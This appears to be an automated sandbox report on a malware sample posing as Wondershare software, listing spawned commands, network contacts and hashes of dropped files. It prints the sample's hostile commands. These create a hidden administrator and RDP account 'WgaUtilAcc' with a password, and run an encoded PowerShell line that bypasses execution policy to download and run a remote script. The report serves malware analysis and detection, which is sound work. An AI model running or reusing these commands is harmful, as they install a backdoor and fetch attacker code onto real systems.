cmd /C net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT /add
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT /add
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc bu4XEaZT
C:\Windows\system32\net.exe
net.exe user WgaUtilAcc bu4XEaZT
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc bu4XEaZT
C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | platform.wondershare.com | udp |
| N/A | 47.91.67.36:80 | platform.wondershare.com | tcp |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/308-59-0x0000000001220000-0x0000000001221000-memory.dmp
memory/308-61-0x00000000010E0000-0x00000000010E2000-memory.dmp
memory/852-62-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
| MD5 | 03051f3c44a2c8d196c95ea458b0aff4 |
| SHA1 | d19a86e11cccdf978ca2d1455d7026d7879869f7 |
| SHA256 | 555f654fb51e632ba2cf49b865b6de5f5772ffba0229d73021a1c6a6f65dab08 |
| SHA512 | 883e31033107ee9f008d34e84638fca2ee085e6cc7c41a288d1663a31beac7109efe718ab7f38f682c8e01a99736e3832c539c95fd4bf25124fed4c9e9eeba46 |
memory/852-65-0x0000000000E50000-0x0000000000E51000-memory.dmp
memory/852-67-0x0000000000420000-0x0000000000451000-memory.dmp
memory/852-68-0x0000000000360000-0x0000000000361000-memory.dmp
\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
memory/848-71-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/1384-76-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
memory/848-74-0x0000000075A31000-0x0000000075A33000-memory.dmp
memory/1384-78-0x0000000041580000-0x000000004182A000-memory.dmp
memory/1384-80-0x0000000041052000-0x0000000041054000-memory.dmp
memory/1384-81-0x0000000041054000-0x0000000041056000-memory.dmp
memory/1384-82-0x0000000041056000-0x0000000041057000-memory.dmp
memory/1384-83-0x0000000041057000-0x0000000041058000-memory.dmp
C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
| MD5 | c9622e294a0f3c6c4dfcf716cd2e6692 |
| SHA1 | 829498d010f331248be9fd512deb44d1eceac344 |
| SHA256 | f519d4517271e01ea6807890fcbc1573e64844b6a8105aa7c3462ea65bb3c7fe |
| SHA512 | d7e5bd51a819b1bb8ec59fbca742fbf40806b8e4e04f56efb00c8b5477b275d1479565b3a156628a86254801610dbef13250ef5b2015da1ef21ff869ef60f552 |
\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/992-86-0x0000000000000000-mapping.dmp
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe.config
| MD5 | ad0967a0ab95aa7d71b3dc92b71b8f7a |
| SHA1 | ed63f517e32094c07a2c5b664ed1cab412233ab5 |
| SHA256 | 9c1212bc648a2533b53a2d0afcec518846d97630afb013742a9622f0df7b04fc |
| SHA512 | 85766a907331f60044ec205cf345453fc3d44bfcac296ac93a12e8a752b84290dfd94f73b71de82f46f9503177d29602cbb87549f89dc61373d889b4ea26634b |
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
| MD5 | 27cfb3990872caa5930fa69d57aefe7b |
| SHA1 | 5e1c80d61e8db0cdc0c9b9fa3b2e36d156d45f8f |
| SHA256 | 43881549228975c7506b050bce4d9b671412d3cdc08c7516c9dbbb7f50c25146 |
| SHA512 | a1509024872c99c1cf63f42d9f3c5f063afde4e9490c21611551ddd2322d136ce9240256113c525305346cf7b66ccca84c3df67637c8fecbfeebf14ffa373a2a |
memory/992-90-0x000007FEEA850000-0x000007FEEB8E6000-memory.dmp
memory/1720-91-0x0000000000000000-mapping.dmp
memory/1720-92-0x000007FEFC661000-0x000007FEFC663000-memory.dmp
memory/1720-94-0x000000001AE50000-0x000000001AE51000-memory.dmp
memory/1720-97-0x000000001ADD4000-0x000000001ADD6000-memory.dmp
memory/1720-96-0x000000001ADD0000-0x000000001ADD2000-memory.dmp
memory/992-95-0x0000000001FC0000-0x0000000001FC2000-memory.dmp
memory/1720-93-0x0000000002450000-0x0000000002451000-memory.dmp
memory/1720-98-0x0000000001ED0000-0x0000000001ED1000-memory.dmp
memory/1720-99-0x0000000002590000-0x0000000002591000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1720-101-0x000000001C530000-0x000000001C531000-memory.dmp
memory/432-102-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.cmdline
| MD5 | bf25e38a015e718efdc8e65541265c1f |
| SHA1 | aa0ea99e74d158b57c6907126762f106d2f52243 |
| SHA256 | d9151355fdf4b02bc6bcd00a4db75f0f66fb4302b416c5f5f483e15aa9dfd42c |
| SHA512 | 9d50e7e649d57e7fc9b26c8e05f06958aabacd538df4f09453c3f6db3d7f7fb54b910144299c00aa1418271c821deeb7555c1f071cefa220323c1d45dc41cb5b |
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1500-105-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5sxesnat\CSCC91B983069BF4F51BD1C6A36E5BB7AD.TMP
| MD5 | e437de9d7d1559a97c188c10be73e921 |
| SHA1 | ec2a03762fa6a218a6e213740438b89ad0d9c2b6 |
| SHA256 | bcaa4a0f33c9c1a57a4158cfc4d59bc62c78b10ffbb1d7208360355e963df2e9 |
| SHA512 | aa46723a7271319d1a80aa3e55a8674473d23d23f1099eda0c11e4393169a3ced55075eee691a9bbb43adae9f6dbc26a9bc14ddb3d7d955a244eba2a28476252 |
C:\Users\Admin\AppData\Local\Temp\RES5A21.tmp
| MD5 | 2fb9db8be02194824abe7f2cbd2b3a3b |
| SHA1 | d93d41c843895fba0340c14b236213544f407196 |
| SHA256 | e7303f5d90a912af457070b1dd5a755324362f31bf28b88243a0eedecf3b5df1 |
| SHA512 | ea713c40f56bd867605cfda18424db7eabc92a9014a529acc399bedb1ab53e250e7f410211ebdbc8db700c772534b7413721a0f6d4ae3f0c676413381ee111ba |
C:\Users\Admin\AppData\Local\Temp\5sxesnat\5sxesnat.dll
| MD5 | 61868b90f5c380b9edf33a851aa51e64 |
| SHA1 | 3ae38fdb842bc81f99db7155ac7207cc9ace8f54 |
| SHA256 | 674564f37e8b65b207640db7da555d6ee30c5297b57158739f05ecbeaa29a2b1 |
| SHA512 | d0aa28af09b5db8f5a97ef6b495c6bd9386be61f6728eb2b140fd2f2e130f8154067ea1b6cb1124912faf49b59f6d357212ac78ddcf6af4dfbd5d1dc493474d4 |
memory/1720-109-0x0000000002330000-0x0000000002331000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1720-111-0x000000001AC50000-0x000000001AC51000-memory.dmp
memory/1720-112-0x000000001C1F0000-0x000000001C1F1000-memory.dmp
memory/1720-113-0x0000000002890000-0x0000000002891000-memory.dmp
memory/2032-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e64effd491fdabcf3c18722c7384de5a |
| SHA1 | 2c3ff4486756c16acc3c2b4d88625dd5f9d80c36 |
| SHA256 | 8dfd169e7009a909381c661c7963d72357ad0b9caa1cdc3f7962b341428efc9e |
| SHA512 | 7764240798d74494df4f2c435b0650bd9d333e62e2ca59c0349551eceabbd108791b9c222fd2f3af3393b59e755f8446b92f8fcc4aee4429635d918d4f8bb8ed |
memory/2032-120-0x000000001AB80000-0x000000001AB82000-memory.dmp
memory/2032-121-0x000000001AB84000-0x000000001AB86000-memory.dmp
memory/2032-122-0x0000000002310000-0x0000000002311000-memory.dmp
memory/2032-124-0x000000001B870000-0x000000001B871000-memory.dmp
memory/2032-126-0x00000000024E0000-0x00000000024E1000-memory.dmp
memory/2032-127-0x0000000002350000-0x0000000002351000-memory.dmp
memory/1720-128-0x000000001ADDA000-0x000000001ADF9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | b04504c64cf6b4668b80b79a91994e74 |
| SHA1 | ac0b8d169db62a00ebcca0ca0820d5d1ea081740 |
| SHA256 | 42da1aa474834d4b9db794e3c329f6bc82a30bc6a899022d4040b3b9985813c1 |
| SHA512 | e0f26edb2607fdb2f6db18981fa1effbead14c961f3a28379caeb2a1f0f46ee2b31b73a6b4416b950aaf3f0e79db60290243a13412ee55184a35f36b0c57aeae |
memory/2032-133-0x000000001B5B0000-0x000000001B5B1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_22330762-ff7d-40b8-a48f-aa5932dc17c9
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/2032-146-0x000000001B510000-0x000000001B511000-memory.dmp
memory/2032-147-0x000000001B520000-0x000000001B521000-memory.dmp
memory/432-148-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e64effd491fdabcf3c18722c7384de5a |
| SHA1 | 2c3ff4486756c16acc3c2b4d88625dd5f9d80c36 |
| SHA256 | 8dfd169e7009a909381c661c7963d72357ad0b9caa1cdc3f7962b341428efc9e |
| SHA512 | 7764240798d74494df4f2c435b0650bd9d333e62e2ca59c0349551eceabbd108791b9c222fd2f3af3393b59e755f8446b92f8fcc4aee4429635d918d4f8bb8ed |
memory/432-154-0x000000001ABF0000-0x000000001ABF2000-memory.dmp
memory/432-155-0x000000001ABF4000-0x000000001ABF6000-memory.dmp
memory/432-156-0x0000000002300000-0x0000000002301000-memory.dmp
memory/432-158-0x000000001B520000-0x000000001B521000-memory.dmp
memory/432-161-0x00000000024B0000-0x00000000024B1000-memory.dmp
memory/432-160-0x0000000002830000-0x0000000002831000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 13ad9a16e4a7a217929c56cf489d88dd |
| SHA1 | 7969af5e5fa652253d51d6d731799d61f7b310f3 |
| SHA256 | 55a2df3b6ebad90232bfb8e46e9a148eb8905b6eb972baf7d1ed444fe9f5a593 |
| SHA512 | 924409ec1bc3d499db6d5e17b1d2db01dcfad7c0d7481d259aee80f3dbf376fbdfd0dfcd863adaa8b4134f1c62608c31c095ee6c990c987b23f53596cae61bb8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ed7deb5a-bcd2-4fbf-baba-968ccaa37dde
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_afad4144-704c-4daf-abdc-1458b9af5480
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00676e6f-05a9-4da9-aa0e-696a0ccc9272
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_31e6a2d0-b6b1-4c20-9630-7dcb57a92d29
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f7036a47-7532-488b-9093-c56335a4d915
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2653500a-e16e-4c7d-b00f-2ef58238a6c3
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
memory/1528-169-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e64effd491fdabcf3c18722c7384de5a |
| SHA1 | 2c3ff4486756c16acc3c2b4d88625dd5f9d80c36 |
| SHA256 | 8dfd169e7009a909381c661c7963d72357ad0b9caa1cdc3f7962b341428efc9e |
| SHA512 | 7764240798d74494df4f2c435b0650bd9d333e62e2ca59c0349551eceabbd108791b9c222fd2f3af3393b59e755f8446b92f8fcc4aee4429635d918d4f8bb8ed |
memory/1528-175-0x0000000002390000-0x0000000002392000-memory.dmp
memory/1528-176-0x0000000002394000-0x0000000002396000-memory.dmp
memory/1468-184-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1912-186-0x0000000000000000-mapping.dmp
memory/1592-187-0x0000000000000000-mapping.dmp
memory/1652-188-0x0000000000000000-mapping.dmp
memory/280-189-0x0000000000000000-mapping.dmp
memory/1852-190-0x0000000000000000-mapping.dmp
memory/2000-191-0x0000000000000000-mapping.dmp
memory/1528-192-0x0000000000000000-mapping.dmp
memory/964-193-0x0000000000000000-mapping.dmp
memory/1468-194-0x0000000000000000-mapping.dmp
memory/1912-195-0x0000000000000000-mapping.dmp
memory/1556-196-0x0000000000000000-mapping.dmp
memory/1616-197-0x0000000000000000-mapping.dmp
memory/1852-198-0x0000000000000000-mapping.dmp
memory/952-199-0x0000000000000000-mapping.dmp
memory/1988-200-0x0000000000000000-mapping.dmp
memory/1784-201-0x0000000000000000-mapping.dmp
memory/2028-202-0x0000000000000000-mapping.dmp
memory/1912-203-0x0000000000000000-mapping.dmp
memory/1840-204-0x0000000000000000-mapping.dmp
memory/1144-205-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/2000-208-0x0000000000000000-mapping.dmp
memory/2056-209-0x0000000000000000-mapping.dmp
memory/2092-210-0x0000000000000000-mapping.dmp
memory/2104-211-0x0000000000000000-mapping.dmp
memory/2152-212-0x0000000000000000-mapping.dmp
memory/2164-213-0x0000000000000000-mapping.dmp
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2216-215-0x0000000000000000-mapping.dmp
memory/2228-216-0x0000000000000000-mapping.dmp
memory/2276-217-0x0000000000000000-mapping.dmp
memory/2288-218-0x0000000000000000-mapping.dmp
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
\??\PIPE\samr
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2344-221-0x0000000000000000-mapping.dmp
memory/2356-222-0x0000000000000000-mapping.dmp
memory/2428-223-0x0000000000000000-mapping.dmp
memory/2488-224-0x0000000000000000-mapping.dmp
memory/2552-225-0x0000000000000000-mapping.dmp
memory/2564-226-0x0000000000000000-mapping.dmp
memory/2564-232-0x00000000195C0000-0x00000000195C2000-memory.dmp
memory/2564-233-0x00000000195C4000-0x00000000195C6000-memory.dmp
memory/2564-262-0x00000000195CA000-0x00000000195E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Setup.zip
| MD5 | 36f178576dcb8db35d6f06448b1eb510 |
| SHA1 | 62277c90cc2b1bb81b36571037afe5081b0605d5 |
| SHA256 | 192fed6a13a0e73d5196a43bc72eeac16e4962ce465ea67dd60d8b16368c215a |
| SHA512 | 9e1dfe8e5196afb5a39d5302d6948cc7282b95c77aba435ed14453094022a302a6c780fbfd2615377d94e2b7e2913601e9129eb6d3398db0ba25344075e5dc96 |
